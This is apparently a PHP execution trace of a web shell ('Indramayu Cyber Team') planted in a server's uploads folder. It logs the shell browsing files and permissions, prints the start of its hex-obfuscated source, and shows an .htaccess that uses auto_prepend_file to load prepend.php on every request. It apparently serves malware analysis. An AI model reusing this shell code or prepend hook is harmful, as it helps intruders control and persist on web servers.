2	1590	0	0.088881	589184	filemtime	0		/var/www/html/uploads/index.php	617	1	'.'
2	1590	1	0.088895	589208
2	1590	R			1676259933
2	1591	0	0.088908	589168	date	0		/var/www/html/uploads/index.php	617	2	'Y-m-d h:i:s'	1676259933
2	1591	1	0.088946	590336
2	1591	R			'2023-02-13 10:45:33'
2	1592	0	0.088964	590008	getowner	1		/var/www/html/uploads/index.php	618	1	'.'
3	1593	0	0.088977	590008	function_exists	0		/var/www/html/uploads/index.php	287	1	'posix_getpwuid'
3	1593	1	0.088990	590048
3	1593	R			TRUE
3	1594	0	0.089003	590008	fileowner	0		/var/www/html/uploads/index.php	288	1	'.'
3	1594	1	0.089016	590048
3	1594	R			0
3	1595	0	0.089028	590008	posix_getpwuid	0		/var/www/html/uploads/index.php	288	1	0
3	1595	1	0.089063	590808
3	1595	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/index.php	288	$downer = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/index.php	289	$downer = 'root'
3	1596	0	0.089117	590040	function_exists	0		/var/www/html/uploads/index.php	293	1	'posix_getgrgid'
3	1596	1	0.089131	590080
3	1596	R			TRUE
3	1597	0	0.089144	590040	filegroup	0		/var/www/html/uploads/index.php	294	1	'.'
3	1597	1	0.089157	590080
3	1597	R			0
3	1598	0	0.089170	590040	posix_getgrgid	0		/var/www/html/uploads/index.php	294	1	0
3	1598	1	0.089205	590696
3	1598	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/index.php	294	$dgrp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/index.php	295	$dgrp = 'root'
2	1592	1	0.089255	590048
2	1592	R			'root/root'
2	1599	0	0.089377	590104	perms	1		/var/www/html/uploads/index.php	619	1	'/var/www/html/uploads/.'
3	1600	0	0.089392	590104	fileperms	0		/var/www/html/uploads/index.php	191	1	'/var/www/html/uploads/.'
3	1600	1	0.089408	590160
3	1600	R			16895
2		A						/var/www/html/uploads/index.php	191	$perms = 16895
2		A						/var/www/html/uploads/index.php	201	$info = 'd'
2		A						/var/www/html/uploads/index.php	209	$info .= 'r'
2		A						/var/www/html/uploads/index.php	210	$info .= 'w'
2		A						/var/www/html/uploads/index.php	213	$info .= 'x'
2		A						/var/www/html/uploads/index.php	214	$info .= 'r'
2		A						/var/www/html/uploads/index.php	215	$info .= 'w'
2		A						/var/www/html/uploads/index.php	218	$info .= 'x'
2		A						/var/www/html/uploads/index.php	219	$info .= 'r'
2		A						/var/www/html/uploads/index.php	220	$info .= 'w'
2		A						/var/www/html/uploads/index.php	223	$info .= 'x'
3	1601	0	0.089534	590160	sprintf	0		/var/www/html/uploads/index.php	224	2	'%o'	16895
3	1601	1	0.089549	590544
3	1601	R			'40777'
3	1602	0	0.089562	590480	substr	0		/var/www/html/uploads/index.php	224	2	'40777'	-4
3	1602	1	0.089575	590576
3	1602	R			'0777'
2	1599	1	0.089589	590168
2	1599	R			'0777 >> drwxrwxrwx'
2	1603	0	0.089603	590120	checkPerm	1		/var/www/html/uploads/index.php	619	2	'/var/www/html/uploads/.'	'0777 >> drwxrwxrwx'
3	1604	0	0.089617	590120	explode	0		/var/www/html/uploads/index.php	275	2	'>>'	'0777 >> drwxrwxrwx'
3	1604	1	0.089631	590640
3	1604	R			[0 => '0777 ', 1 => ' drwxrwxrwx']
2		A						/var/www/html/uploads/index.php	275	$perm = [0 => '0777 ', 1 => ' drwxrwxrwx']
3	1605	0	0.089660	590568	is_writable	0		/var/www/html/uploads/index.php	276	1	'/var/www/html/uploads/.'
3	1605	1	0.089677	590608
3	1605	R			TRUE
2	1603	1	0.089692	590248
2	1603	R			'<font class=\'text-success\'>0777 </font> >> <font class=\'text-success\'> drwxrwxrwx</font>'
2	1606	0	0.089712	590080	is_dir	0		/var/www/html/uploads/index.php	603	1	'/var/www/html/uploads/..'
2	1606	1	0.089727	590128
2	1606	R			TRUE
2	1607	0	0.089741	590032	dirname	0		/var/www/html/uploads/index.php	608	1	'/var/www/html/uploads'
2	1607	1	0.089754	590112
2	1607	R			'/var/www/html'
2	1608	0	0.089769	590032	filetype	0		/var/www/html/uploads/index.php	615	1	'..'
2	1608	1	0.089783	590104
2	1608	R			'dir'
2	1609	0	0.089797	590032	filemtime	0		/var/www/html/uploads/index.php	617	1	'..'
2	1609	1	0.089810	590048
2	1609	R			1676259933
2	1610	0	0.089824	590008	date	0		/var/www/html/uploads/index.php	617	2	'Y-m-d h:i:s'	1676259933
2	1610	1	0.089840	590336
2	1610	R			'2023-02-13 10:45:33'
2	1611	0	0.089854	590008	getowner	1		/var/www/html/uploads/index.php	618	1	'..'
3	1612	0	0.089867	590008	function_exists	0		/var/www/html/uploads/index.php	287	1	'posix_getpwuid'
3	1612	1	0.089880	590048
3	1612	R			TRUE
3	1613	0	0.089893	590008	fileowner	0		/var/www/html/uploads/index.php	288	1	'..'
3	1613	1	0.089906	590048
3	1613	R			0
3	1614	0	0.089918	590008	posix_getpwuid	0		/var/www/html/uploads/index.php	288	1	0
3	1614	1	0.089941	590808
3	1614	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/index.php	288	$downer = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/index.php	289	$downer = 'root'
3	1615	0	0.089993	590040	function_exists	0		/var/www/html/uploads/index.php	293	1	'posix_getgrgid'
3	1615	1	0.090006	590080
3	1615	R			TRUE
3	1616	0	0.090020	590040	filegroup	0		/var/www/html/uploads/index.php	294	1	'..'
3	1616	1	0.090032	590080
3	1616	R			0
3	1617	0	0.090045	590040	posix_getgrgid	0		/var/www/html/uploads/index.php	294	1	0
3	1617	1	0.090066	590696
3	1617	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/index.php	294	$dgrp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/index.php	295	$dgrp = 'root'
2	1611	1	0.090112	590048
2	1611	R			'root/root'
2	1618	0	0.090127	590120	perms	1		/var/www/html/uploads/index.php	619	1	'/var/www/html/uploads/..'
3	1619	0	0.090140	590120	fileperms	0		/var/www/html/uploads/index.php	191	1	'/var/www/html/uploads/..'
3	1619	1	0.090155	590184
3	1619	R			16895
2		A						/var/www/html/uploads/index.php	191	$perms = 16895
2		A						/var/www/html/uploads/index.php	201	$info = 'd'
2		A						/var/www/html/uploads/index.php	209	$info .= 'r'
2		A						/var/www/html/uploads/index.php	210	$info .= 'w'
2		A						/var/www/html/uploads/index.php	213	$info .= 'x'
2		A						/var/www/html/uploads/index.php	214	$info .= 'r'
2		A						/var/www/html/uploads/index.php	215	$info .= 'w'
2		A						/var/www/html/uploads/index.php	218	$info .= 'x'
2		A						/var/www/html/uploads/index.php	219	$info .= 'r'
2		A						/var/www/html/uploads/index.php	220	$info .= 'w'
2		A						/var/www/html/uploads/index.php	223	$info .= 'x'
3	1620	0	0.090277	590184	sprintf	0		/var/www/html/uploads/index.php	224	2	'%o'	16895
3	1620	1	0.090291	590568
3	1620	R			'40777'
3	1621	0	0.090304	590504	substr	0		/var/www/html/uploads/index.php	224	2	'40777'	-4
3	1621	1	0.090317	590600
3	1621	R			'0777'
2	1618	1	0.090330	590192
2	1618	R			'0777 >> drwxrwxrwx'
2	1622	0	0.090345	590136	checkPerm	1		/var/www/html/uploads/index.php	619	2	'/var/www/html/uploads/..'	'0777 >> drwxrwxrwx'
3	1623	0	0.090359	590136	explode	0		/var/www/html/uploads/index.php	275	2	'>>'	'0777 >> drwxrwxrwx'
3	1623	1	0.090373	590656
3	1623	R			[0 => '0777 ', 1 => ' drwxrwxrwx']
2		A						/var/www/html/uploads/index.php	275	$perm = [0 => '0777 ', 1 => ' drwxrwxrwx']
3	1624	0	0.090402	590584	is_writable	0		/var/www/html/uploads/index.php	276	1	'/var/www/html/uploads/..'
3	1624	1	0.090418	590624
3	1624	R			TRUE
2	1622	1	0.090433	590264
2	1622	R			'<font class=\'text-success\'>0777 </font> >> <font class=\'text-success\'> drwxrwxrwx</font>'
2	1625	0	0.090452	590088	is_dir	0		/var/www/html/uploads/index.php	603	1	'/var/www/html/uploads/.htaccess'
2	1625	1	0.090468	590128
2	1625	R			FALSE
2	1626	0	0.090481	590088	is_dir	0		/var/www/html/uploads/index.php	603	1	'/var/www/html/uploads/data'
2	1626	1	0.090496	590128
2	1626	R			TRUE
2	1627	0	0.090510	590032	checkName	1		/var/www/html/uploads/index.php	612	1	'data'
3	1628	0	0.090523	590032	strlen	0		/var/www/html/uploads/index.php	267	1	'data'
3	1628	1	0.090535	590064
3	1628	R			4
2	1627	1	0.090548	590032
2	1627	R			'data'
2	1629	0	0.090562	590032	filetype	0		/var/www/html/uploads/index.php	615	1	'data'
2	1629	1	0.090576	590104
2	1629	R			'dir'
2	1630	0	0.090590	590032	filemtime	0		/var/www/html/uploads/index.php	617	1	'data'
2	1630	1	0.090604	590048
2	1630	R			1676259933
2	1631	0	0.090617	590008	date	0		/var/www/html/uploads/index.php	617	2	'Y-m-d h:i:s'	1676259933
2	1631	1	0.090633	590336
2	1631	R			'2023-02-13 10:45:33'
2	1632	0	0.090647	590008	getowner	1		/var/www/html/uploads/index.php	618	1	'data'
3	1633	0	0.090660	590008	function_exists	0		/var/www/html/uploads/index.php	287	1	'posix_getpwuid'
3	1633	1	0.090673	590048
3	1633	R			TRUE
3	1634	0	0.090686	590008	fileowner	0		/var/www/html/uploads/index.php	288	1	'data'
3	1634	1	0.090698	590048
3	1634	R			0
3	1635	0	0.090711	590008	posix_getpwuid	0		/var/www/html/uploads/index.php	288	1	0
3	1635	1	0.090733	590808
3	1635	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/index.php	288	$downer = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/index.php	289	$downer = 'root'
3	1636	0	0.090785	590040	function_exists	0		/var/www/html/uploads/index.php	293	1	'posix_getgrgid'
3	1636	1	0.090798	590080
3	1636	R			TRUE
3	1637	0	0.090811	590040	filegroup	0		/var/www/html/uploads/index.php	294	1	'data'
3	1637	1	0.090824	590080
3	1637	R			0
3	1638	0	0.090836	590040	posix_getgrgid	0		/var/www/html/uploads/index.php	294	1	0
3	1638	1	0.090858	590696
3	1638	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/index.php	294	$dgrp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/index.php	295	$dgrp = 'root'
2	1632	1	0.090904	590048
2	1632	R			'root/root'
2	1639	0	0.090919	590120	perms	1		/var/www/html/uploads/index.php	619	1	'/var/www/html/uploads/data'
3	1640	0	0.090932	590120	fileperms	0		/var/www/html/uploads/index.php	191	1	'/var/www/html/uploads/data'
3	1640	1	0.090946	590184
3	1640	R			16895
2		A						/var/www/html/uploads/index.php	191	$perms = 16895
2		A						/var/www/html/uploads/index.php	201	$info = 'd'
2		A						/var/www/html/uploads/index.php	209	$info .= 'r'
2		A						/var/www/html/uploads/index.php	210	$info .= 'w'
2		A						/var/www/html/uploads/index.php	213	$info .= 'x'
2		A						/var/www/html/uploads/index.php	214	$info .= 'r'
2		A						/var/www/html/uploads/index.php	215	$info .= 'w'
2		A						/var/www/html/uploads/index.php	218	$info .= 'x'
2		A						/var/www/html/uploads/index.php	219	$info .= 'r'
2		A						/var/www/html/uploads/index.php	220	$info .= 'w'
2		A						/var/www/html/uploads/index.php	223	$info .= 'x'
3	1641	0	0.091070	590184	sprintf	0		/var/www/html/uploads/index.php	224	2	'%o'	16895
3	1641	1	0.091084	590568
3	1641	R			'40777'
3	1642	0	0.091097	590504	substr	0		/var/www/html/uploads/index.php	224	2	'40777'	-4
3	1642	1	0.091110	590600
3	1642	R			'0777'
2	1639	1	0.091124	590192
2	1639	R			'0777 >> drwxrwxrwx'
2	1643	0	0.091138	590136	checkPerm	1		/var/www/html/uploads/index.php	619	2	'/var/www/html/uploads/data'	'0777 >> drwxrwxrwx'
3	1644	0	0.091153	590136	explode	0		/var/www/html/uploads/index.php	275	2	'>>'	'0777 >> drwxrwxrwx'
3	1644	1	0.091167	590656
3	1644	R			[0 => '0777 ', 1 => ' drwxrwxrwx']
2		A						/var/www/html/uploads/index.php	275	$perm = [0 => '0777 ', 1 => ' drwxrwxrwx']
3	1645	0	0.091195	590584	is_writable	0		/var/www/html/uploads/index.php	276	1	'/var/www/html/uploads/data'
3	1645	1	0.091211	590624
3	1645	R			TRUE
2	1643	1	0.091226	590264
2	1643	R			'<font class=\'text-success\'>0777 </font> >> <font class=\'text-success\'> drwxrwxrwx</font>'
2	1646	0	0.091246	590088	is_dir	0		/var/www/html/uploads/index.php	603	1	'/var/www/html/uploads/index.php'
2	1646	1	0.091261	590128
2	1646	R			FALSE
2	1647	0	0.091274	590096	is_dir	0		/var/www/html/uploads/index.php	603	1	'/var/www/html/uploads/prepend.php'
2	1647	1	0.091290	590144
2	1647	R			FALSE
2	1648	0	0.091304	590088	is_file	0		/var/www/html/uploads/index.php	628	1	'/var/www/html/uploads/.'
2	1648	1	0.091319	590112
2	1648	R			FALSE
2	1649	0	0.091333	590080	is_file	0		/var/www/html/uploads/index.php	628	1	'/var/www/html/uploads/..'
2	1649	1	0.091347	590128
2	1649	R			FALSE
2	1650	0	0.091360	590088	is_file	0		/var/www/html/uploads/index.php	628	1	'/var/www/html/uploads/.htaccess'
2	1650	1	0.091375	590128
2	1650	R			TRUE
2	1651	0	0.091390	590032	file_get_contents	0		/var/www/html/uploads/index.php	631	1	'.htaccess'
2	1651	1	0.091418	590168
2	1651	R			'php_value auto_prepend_file "/var/www/html/uploads/prepend.php"\n'
2	1652	0	0.091437	590128	htmlspecialchars	0		/var/www/html/uploads/index.php	631	1	'php_value auto_prepend_file "/var/www/html/uploads/prepend.php"\n'
2	1652	1	0.091454	590320
2	1652	R			'php_value auto_prepend_file &quot;/var/www/html/uploads/prepend.php&quot;\n'
2	1653	0	0.091472	590032	geticon	1		/var/www/html/uploads/index.php	631	1	'.htaccess'
3	1654	0	0.091486	590032	pathinfo	0		/var/www/html/uploads/index.php	304	2	'.htaccess'	4
3	1654	1	0.091500	590136
3	1654	R			'htaccess'
3	1655	0	0.091514	590072	strtolower	0		/var/www/html/uploads/index.php	304	1	'htaccess'
3	1655	1	0.091526	590104
3	1655	R			'htaccess'
2		A						/var/www/html/uploads/index.php	304	$ext = 'htaccess'
2	1653	1	0.091553	590032
2	1653	R			'file'
2	1656	0	0.091567	590032	checkName	1		/var/www/html/uploads/index.php	631	1	'.htaccess'
3	1657	0	0.091580	590032	strlen	0		/var/www/html/uploads/index.php	267	1	'.htaccess'
3	1657	1	0.091592	590064
3	1657	R			9
2	1656	1	0.091605	590032
2	1656	R			'.htaccess'
2	1658	0	0.091620	590032	function_exists	0		/var/www/html/uploads/index.php	632	1	'mime_content_type'
2	1658	1	0.091633	590072
2	1658	R			TRUE
2	1659	0	0.091646	590032	mime_content_type	0		/var/www/html/uploads/index.php	632	1	'.htaccess'
2	1659	1	0.092682	590104
2	1659	R			'text/plain'
2	1660	0	0.092704	590072	checkName	1		/var/www/html/uploads/index.php	632	1	'text/plain'
3	1661	0	0.092720	590072	strlen	0		/var/www/html/uploads/index.php	267	1	'text/plain'
3	1661	1	0.092733	590104
3	1661	R			10
2	1660	1	0.092754	590072
2	1660	R			'text/plain'
2	1662	0	0.092770	590032	filesize	0		/var/www/html/uploads/index.php	633	1	'.htaccess'
2	1662	1	0.092786	590056
2	1662	R			64
2	1663	0	0.092800	590016	formatSize	1		/var/www/html/uploads/index.php	633	1	64
2		A						/var/www/html/uploads/index.php	184	$types = [0 => 'B', 1 => 'KB', 2 => 'MB', 3 => 'GB', 4 => 'TB']
2		A						/var/www/html/uploads/index.php	185	$i = 0
3	1664	0	0.092839	590016	round	0		/var/www/html/uploads/index.php	186	2	64	2
3	1664	1	0.092852	590088
3	1664	R			64
2	1663	1	0.092867	590048
2	1663	R			'64 B'
2	1665	0	0.092882	590016	filemtime	0		/var/www/html/uploads/index.php	634	1	'.htaccess'
2	1665	1	0.092895	590056
2	1665	R			1676259933
2	1666	0	0.092908	590016	date	0		/var/www/html/uploads/index.php	634	2	'Y-m-d h:i:s'	1676259933
2	1666	1	0.092924	590344
2	1666	R			'2023-02-13 10:45:33'
2	1667	0	0.092939	590016	getowner	1		/var/www/html/uploads/index.php	635	1	'.htaccess'
3	1668	0	0.092951	590016	function_exists	0		/var/www/html/uploads/index.php	287	1	'posix_getpwuid'
3	1668	1	0.092965	590056
3	1668	R			TRUE
3	1669	0	0.092978	590016	fileowner	0		/var/www/html/uploads/index.php	288	1	'.htaccess'
3	1669	1	0.092991	590056
3	1669	R			0
3	1670	0	0.093004	590016	posix_getpwuid	0		/var/www/html/uploads/index.php	288	1	0
3	1670	1	0.093035	590816
3	1670	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/index.php	288	$downer = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/index.php	289	$downer = 'root'
3	1671	0	0.093089	590048	function_exists	0		/var/www/html/uploads/index.php	293	1	'posix_getgrgid'
3	1671	1	0.093103	590088
3	1671	R			TRUE
3	1672	0	0.093116	590048	filegroup	0		/var/www/html/uploads/index.php	294	1	'.htaccess'
3	1672	1	0.093129	590088
3	1672	R			0
3	1673	0	0.093142	590048	posix_getgrgid	0		/var/www/html/uploads/index.php	294	1	0
3	1673	1	0.093166	590704
3	1673	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/index.php	294	$dgrp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/index.php	295	$dgrp = 'root'
2	1667	1	0.093229	590056
2	1667	R			'root/root'
2	1674	0	0.093244	590128	perms	1		/var/www/html/uploads/index.php	636	1	'/var/www/html/uploads/.htaccess'
3	1675	0	0.093258	590128	fileperms	0		/var/www/html/uploads/index.php	191	1	'/var/www/html/uploads/.htaccess'
3	1675	1	0.093274	590184
3	1675	R			33188
2		A						/var/www/html/uploads/index.php	191	$perms = 33188
2		A						/var/www/html/uploads/index.php	197	$info = '-'
2		A						/var/www/html/uploads/index.php	209	$info .= 'r'
2		A						/var/www/html/uploads/index.php	210	$info .= 'w'
2		A						/var/www/html/uploads/index.php	213	$info .= '-'
2		A						/var/www/html/uploads/index.php	214	$info .= 'r'
2		A						/var/www/html/uploads/index.php	215	$info .= '-'
2		A						/var/www/html/uploads/index.php	218	$info .= '-'
2		A						/var/www/html/uploads/index.php	219	$info .= 'r'
2		A						/var/www/html/uploads/index.php	220	$info .= '-'
2		A						/var/www/html/uploads/index.php	223	$info .= '-'
3	1676	0	0.093392	590184	sprintf	0		/var/www/html/uploads/index.php	224	2	'%o'	33188
3	1676	1	0.093406	590568
3	1676	R			'100644'
3	1677	0	0.093419	590504	substr	0		/var/www/html/uploads/index.php	224	2	'100644'	-4
3	1677	1	0.093432	590600
3	1677	R			'0644'
2	1674	1	0.093446	590192
2	1674	R			'0644 >> -rw-r--r--'
2	1678	0	0.093460	590136	checkPerm	1		/var/www/html/uploads/index.php	636	2	'/var/www/html/uploads/.htaccess'	'0644 >> -rw-r--r--'
3	1679	0	0.093476	590136	explode	0		/var/www/html/uploads/index.php	275	2	'>>'	'0644 >> -rw-r--r--'
3	1679	1	0.093490	590656
3	1679	R			[0 => '0644 ', 1 => ' -rw-r--r--']
2		A						/var/www/html/uploads/index.php	275	$perm = [0 => '0644 ', 1 => ' -rw-r--r--']
3	1680	0	0.093519	590584	is_writable	0		/var/www/html/uploads/index.php	276	1	'/var/www/html/uploads/.htaccess'
3	1680	1	0.093541	590624
3	1680	R			FALSE
3	1681	0	0.093556	590584	is_readable	0		/var/www/html/uploads/index.php	278	1	'/var/www/html/uploads/.htaccess'
3	1681	1	0.093571	590624
3	1681	R			TRUE
2	1678	1	0.093586	590264
2	1678	R			'<font class=\'text-secondary\'>0644 </font> >> <font class=\'text-secondary\'> -rw-r--r--</font>'
2	1682	0	0.093606	590032	file_get_contents	0		/var/www/html/uploads/index.php	639	1	'.htaccess'
2	1682	1	0.093633	590168
2	1682	R			'php_value auto_prepend_file "/var/www/html/uploads/prepend.php"\n'
2	1683	0	0.093651	590128	htmlspecialchars	0		/var/www/html/uploads/index.php	639	1	'php_value auto_prepend_file "/var/www/html/uploads/prepend.php"\n'
2	1683	1	0.093668	590320
2	1683	R			'php_value auto_prepend_file &quot;/var/www/html/uploads/prepend.php&quot;\n'
2	1684	0	0.093687	590088	is_file	0		/var/www/html/uploads/index.php	628	1	'/var/www/html/uploads/data'
2	1684	1	0.093703	590128
2	1684	R			FALSE
2	1685	0	0.093717	590088	is_file	0		/var/www/html/uploads/index.php	628	1	'/var/www/html/uploads/index.php'
2	1685	1	0.093731	590128
2	1685	R			TRUE
2	1686	0	0.093745	590032	file_get_contents	0		/var/www/html/uploads/index.php	631	1	'index.php'
2	1686	1	0.093778	622840
2	1686	R			'<?php\n\n$shellName = \'Indramayu Cyber Team\';\n$logo = \'https://1.bp.blogspot.com/-M0ZH5WcjeLk/YPHKrrDwwqI/AAAAAAAAALQ/UElzDOSvAwErnaFmd0hSxqxN6gCiC4-cwCLcBGAsYHQ/s320/images.jpeg\';\n$func = ["7068705f756e616d65", "70687076657273696f6e", "676574637764", "6368646972", "707265675f73706c6974", "61727261795f64696666", "69735f646972", "69735f66696c65", "69735f7772697461626c65", "69735f7265616461626c65", "66696c6573697a65", "636f7079", "66696c655f657869737473", "66696c655f7075745f636f6e74656e7473", "66696c655'
2	1687	0	0.093878	622800	htmlspecialchars	0		/var/www/html/uploads/index.php	631	1	'<?php\n\n$shellName = \'Indramayu Cyber Team\';\n$logo = \'https://1.bp.blogspot.com/-M0ZH5WcjeLk/YPHKrrDwwqI/AAAAAAAAALQ/UElzDOSvAwErnaFmd0hSxqxN6gCiC4-cwCLcBGAsYHQ/s320/images.jpeg\';\n$func = ["7068705f756e616d65", "70687076657273696f6e", "676574637764", "6368646972", "707265675f73706c6974", "61727261795f64696666", "69735f646972", "69735f66696c65", "69735f7772697461626c65", "69735f7265616461626c65", "66696c6573697a65", "636f7079", "66696c655f657869737473", "66696c655f7075745f636f6e74656e7473", "66696c655'
2	1687	1	0.094471	688368
2	1687	R			'&lt;?php\n\n$shellName = \'Indramayu Cyber Team\';\n$logo = \'https://1.bp.blogspot.com/-M0ZH5WcjeLk/YPHKrrDwwqI/AAAAAAAAALQ/UElzDOSvAwErnaFmd0hSxqxN6gCiC4-cwCLcBGAsYHQ/s320/images.jpeg\';\n$func = [&quot;7068705f756e616d65&quot;, &quot;70687076657273696f6e&quot;, &quot;676574637764&quot;, &quot;6368646972&quot;, &quot;707265675f73706c6974&quot;, &quot;61727261795f64696666&quot;, &quot;69735f646972&quot;, &quot;69735f66696c65&quot;, &quot;69735f7772697461626c65&quot;, &quot;69735f7265616461626c65&quot;, &qu'
2	1688	0	0.095237	630992	geticon	1		/var/www/html/uploads/index.php	631	1	'index.php'
3	1689	0	0.095252	630992	pathinfo	0		/var/www/html/uploads/index.php	304	2	'index.php'	4
3	1689	1	0.095268	631088
3	1689	R			'php'
3	1690	0	0.095282	631024	strtolower	0		/var/www/html/uploads/index.php	304	1	'php'
3	1690	1	0.095295	631056
3	1690	R			'php'
2		A						/var/www/html/uploads/index.php	304	$ext = 'php'
2	1688	1	0.095321	630992
2	1688	R			'file-code'
2	1691	0	0.095335	630992	checkName	1		/var/www/html/uploads/index.php	631	1	'index.php'
3	1692	0	0.095348	630992	strlen	0		/var/www/html/uploads/index.php	267	1	'index.php'
3	1692	1	0.095360	631024
3	1692	R			9
2	1691	1	0.095373	630992
2	1691	R			'index.php'
2	1693	0	0.095387	630992	function_exists	0		/var/www/html/uploads/index.php	632	1	'mime_content_type'
2	1693	1	0.095401	631032
2	1693	R			TRUE
2	1694	0	0.095414	630992	mime_content_type	0		/var/www/html/uploads/index.php	632	1	'index.php'
2	1694	1	0.096836	631064
2	1694	R			'text/x-php'
2	1695	0	0.096859	631032	checkName	1		/var/www/html/uploads/index.php	632	1	'text/x-php'
3	1696	0	0.096875	631032	strlen	0		/var/www/html/uploads/index.php	267	1	'text/x-php'
3	1696	1	0.096888	631064
3	1696	R			10
2	1695	1	0.096902	631032
2	1695	R			'text/x-php'
2	1697	0	0.096917	630992	filesize	0		/var/www/html/uploads/index.php	633	1	'index.php'
2	1697	1	0.096935	631016
2	1697	R			32336
2	1698	0	0.096949	630976	formatSize	1		/var/www/html/uploads/index.php	633	1	32336
2		A						/var/www/html/uploads/index.php	184	$types = [0 => 'B', 1 => 'KB', 2 => 'MB', 3 => 'GB', 4 => 'TB']
2		A						/var/www/html/uploads/index.php	185	$i = 0
2		A						/var/www/html/uploads/index.php	185	$bytes /= 1024
2		A						/var/www/html/uploads/index.php	185	$i++
3	1699	0	0.097016	630976	round	0		/var/www/html/uploads/index.php	186	2	31.578125	2
3	1699	1	0.097034	631048
3	1699	R			31.58
2	1698	1	0.097050	631016
2	1698	R			'31.58 KB'
2	1700	0	0.097065	630976	filemtime	0		/var/www/html/uploads/index.php	634	1	'index.php'
2	1700	1	0.097078	631016
2	1700	R			1676259933
2	1701	0	0.097092	630976	date	0		/var/www/html/uploads/index.php	634	2	'Y-m-d h:i:s'	1676259933
2	1701	1	0.097108	631304
2	1701	R			'2023-02-13 10:45:33'
2	1702	0	0.097122	630976	getowner	1		/var/www/html/uploads/index.php	635	1	'index.php'
3	1703	0	0.097135	630976	function_exists	0		/var/www/html/uploads/index.php	287	1	'posix_getpwuid'
3	1703	1	0.097149	631016
3	1703	R			TRUE
3	1704	0	0.097162	630976	fileowner	0		/var/www/html/uploads/index.php	288	1	'index.php'
3	1704	1	0.097208	631016
3	1704	R			1000
3	1705	0	0.097222	630976	posix_getpwuid	0		/var/www/html/uploads/index.php	288	1	1000
3	1705	1	0.097256	631792
3	1705	R			['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/index.php	288	$downer = ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/index.php	289	$downer = 'osboxes'
3	1706	0	0.097312	631008	function_exists	0		/var/www/html/uploads/index.php	293	1	'posix_getgrgid'
3	1706	1	0.097325	631048
3	1706	R			TRUE
3	1707	0	0.097339	631008	filegroup	0		/var/www/html/uploads/index.php	294	1	'index.php'
3	1707	1	0.097352	631048
3	1707	R			1000
3	1708	0	0.097365	631008	posix_getgrgid	0		/var/www/html/uploads/index.php	294	1	1000
3	1708	1	0.097397	631664
3	1708	R			['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
2		A						/var/www/html/uploads/index.php	294	$dgrp = ['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
2		A						/var/www/html/uploads/index.php	295	$dgrp = 'osboxes'
2	1702	1	0.097443	631016
2	1702	R			'osboxes/osboxes'
2	1709	0	0.097459	631088	perms	1		/var/www/html/uploads/index.php	636	1	'/var/www/html/uploads/index.php'
3	1710	0	0.097471	631088	fileperms	0		/var/www/html/uploads/index.php	191	1	'/var/www/html/uploads/index.php'
3	1710	1	0.097486	631144
3	1710	R			33204
2		A						/var/www/html/uploads/index.php	191	$perms = 33204
2		A						/var/www/html/uploads/index.php	197	$info = '-'
2		A						/var/www/html/uploads/index.php	209	$info .= 'r'
2		A						/var/www/html/uploads/index.php	210	$info .= 'w'
2		A						/var/www/html/uploads/index.php	213	$info .= '-'
2		A						/var/www/html/uploads/index.php	214	$info .= 'r'
2		A						/var/www/html/uploads/index.php	215	$info .= 'w'
2		A						/var/www/html/uploads/index.php	218	$info .= '-'
2		A						/var/www/html/uploads/index.php	219	$info .= 'r'
2		A						/var/www/html/uploads/index.php	220	$info .= '-'
2		A						/var/www/html/uploads/index.php	223	$info .= '-'
3	1711	0	0.097606	631144	sprintf	0		/var/www/html/uploads/index.php	224	2	'%o'	33204
3	1711	1	0.097620	631528
3	1711	R			'100664'
3	1712	0	0.097633	631464	substr	0		/var/www/html/uploads/index.php	224	2	'100664'	-4
3	1712	1	0.097647	631560
3	1712	R			'0664'
2	1709	1	0.097660	631152
2	1709	R			'0664 >> -rw-rw-r--'
2	1713	0	0.097675	631096	checkPerm	1		/var/www/html/uploads/index.php	636	2	'/var/www/html/uploads/index.php'	'0664 >> -rw-rw-r--'
